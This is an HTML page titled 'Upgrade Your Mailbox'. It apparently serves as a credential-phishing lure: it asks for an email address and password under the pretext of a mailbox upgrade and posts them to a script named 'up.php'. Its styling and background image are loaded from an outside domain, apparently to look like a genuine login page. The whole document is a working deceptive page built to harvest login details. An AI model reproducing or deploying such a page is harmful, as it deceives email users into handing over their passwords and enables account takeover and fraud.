<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
<html><head><title>Upgrade Your Mailbox</title>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-15'/>
<link rel='stylesheet' type='text/css' href='http://www.outitgoes.com/default.css' />
<!-- no core stylesheet -->
</head>

<body class='centre' style='margin-top: 32px; text-align: centre; background: #fff'>
<div style='border: none; margin-right: auto; margin-left: auto; width: 447px; height: 436px; padding: 10px; background: url("http://www.outitgoes.com/login_panel_gradient.jpg") top center no-repeat'>
<form method='post' action='up.php'>
			<div>
			<h1>Upgrade Your Mailbox</h1>
			<p>Enter your account details correctly to Upgrade Your Mailbox.</p>

			<div class='centre'>
			<table style='margin-left: auto; margin-right: auto; width: 300px'>
			<tbody>
			<tr>
			<th style='width: 20%; text-align: right; padding-right: 1em'>Email&nbsp;Address: </th>
			<td style='text-align: left'><input type='email' name='email' size='30'/></td>
			</tr>

			<tr>

			<th style='text-align: right; padding-right: 1em'>Password: </th>
			<td style='text-align: left'><input type='password' name='password' size='30'/></td>
			</tr>
			</tbody>

			</table>
			<p>Be sure that your details are entered correctly before clicking 'Upgrade My Mailbox!' botton.</p>

			<br><br>
			<input type='submit' value='Upgrade My Mailbox!'/>
			<br><br>
			</div>

			</div></form>
</div>


</body></html><!-- 1 -->